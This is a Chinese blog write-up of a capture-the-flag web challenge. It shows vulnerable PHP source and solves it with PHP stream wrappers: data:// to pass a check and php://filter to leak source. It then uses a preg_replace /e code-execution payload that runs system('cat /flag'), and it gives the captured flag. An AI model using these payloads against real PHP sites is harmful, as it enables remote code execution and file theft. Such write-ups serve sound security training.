[BJDCTF2020]ZJCTF,不过如此 1

已于 2022-07-20 09:25:23 修改
阅读量709 收藏 3
点赞数 1
文章标签: php 开发语言
于 2022-07-04 08:14:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43618536/article/details/125585635
版权

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档

[BJDCTF2020]ZJCTF,不过如此 1

题目

BUUCTF的[BJDCTF2020]ZJCTF,不过如此 1
在这里插入图片描述

一、做题步骤

1.审计代码

代码如下:

<?php

error_reporting(0);
$text = $_GET["text"];
$file = $_GET["file"];
if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    if(preg_match("/flag/",$file)){
        die("Not now!");
    }

    include($file);  //next.php
    
}
else{
    highlight_file(__FILE__);
}
?>

2.伪协议

1.用data构造伪协议

?text=data://text/plain,I have a dream

在这里插入图片描述
2.用php://filter构造伪协议

file=php://filter/read=convert.base64-encode/resource=next.php

在这里插入图片描述

3.解密

1.将base64解密

代码如下:

<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;
function complex($re, $str) {
    return preg_replace(
        '/(' . $re . ')/ei',
        'strtolower("\\1")',
        $str
    );
}
foreach($_GET as $re => $str) {
    echo complex($re, $str). "\n";
}
function getFlag(){
	@eval($_GET['cmd']);
}

2.构造payload

preg_replace()的/e模式存在命令执行漏洞
因此构造:
?\S*=${getFlag()}&cmd=system(‘cat /flag’);

在这里插入图片描述
3.获取flag{7678a862-149d-40ac-89b5-fae4637f3ac1}

林本
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
[BJDCTF2020]ZJCTF不过如此1
qq_48008847的博客
07-16 1770
通过分析代码,get传入两个参数text和file,text参数利用file_get_contents()函数只读形式打开,打开后内容要与"I have a dream"字符串相匹配,才能执行下面的文件包含$file参数。 看到用的是file_get_contents()函数打开text参数,以及后面的文件包含函数,自然的想到php伪协议中的data://协议用filter协议去读下next.php的源码 获取next.php的payload: index.php?text=data://text..
buuctf-[BJDCTF2020]ZJCTF不过如此
qq_42728977的博客
12-26 2364
[BJDCTF2020]ZJCTF不过如此考点复现参考 考点 preg_replace /e 参数执行漏洞、php伪协议、转义绕过 复现 点开链接 <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1&g
[BUUCTF][BJDCTF2020]ZJCTF不过如此1(做题记录
最新发布
qq_48597181的博客
04-05 899
作为正则表达式匹配条件的参数名且这个参数值为的"getFlag();参数名:cmd和需要php执行的代码所以构造id=1&\S*={${getFlag()}}&cmd=system('linux命令');PS:\S是什么意思?正则表达式\S匹配非空字符PS: 为什么用{${getFlag()}} 这个写法?会调用phpinfo()函数并试图将结果嵌入到字符串中。而如果使用phpinfo()函数,它不会自动嵌入到字符串中。(我在这试了好久TAT。
[BJDCTF2020]ZJCTF不过如此(php双引号、伪协议、preg_replace)
qq_43622442的博客
05-09 1976
[BJDCTF2020]ZJCTF不过如此(php双引号、伪协议、preg_replace) 1.打开网站,审计,第一个if可以用php://input 或者 data://伪协议绕过,php伪协议分析可看php伪协议: 2.然后往下,提示next.php文件,这里可以用php://filter伪协议拿到它的源码: 3.payload: http://90812d78-a226-4cdf-be8f-8baa9961fb89.node3.buuoj.cn/?text=php://input&f
BUUCTF [BJDCTF2020]ZJCTF不过如此
Chu_Jian_Xiong的博客
09-29 640
[BJDCTF2020]ZJCTF不过如此考点PHP伪协议preg_replace远程代码执行实操 考点 PHP伪协议 https://www.cnblogs.com/wjrblogs/p/12285202.html preg_replace远程代码执行 https://zhuanlan.zhihu.com/p/47353283 实操 打开题目 乍一看,显然是一个PHP伪协议的题目,要求"I have a dream",以及提示包含next.php PD9waHAKJGlkID0gJF9HRVRb
[BJDCTF2020]ZJCTF不过如此
夜幕下的灯火阑珊的博客
05-14 2011
知识点 php://input filter伪协议 preg_replace() /e模式命令执行题目源码 <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I...
[bjdctf2020]zjctf不过如此
03-16
[bjdctf202]zjctf不过如此,是一道比赛题目的名称。具体的题目内容和解法我不清楚,因为我只是一个人工智能语言模型,没有参加过这个比赛。不过,如果您有相关的问题或者需要帮助,我会尽力回答和帮助您。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值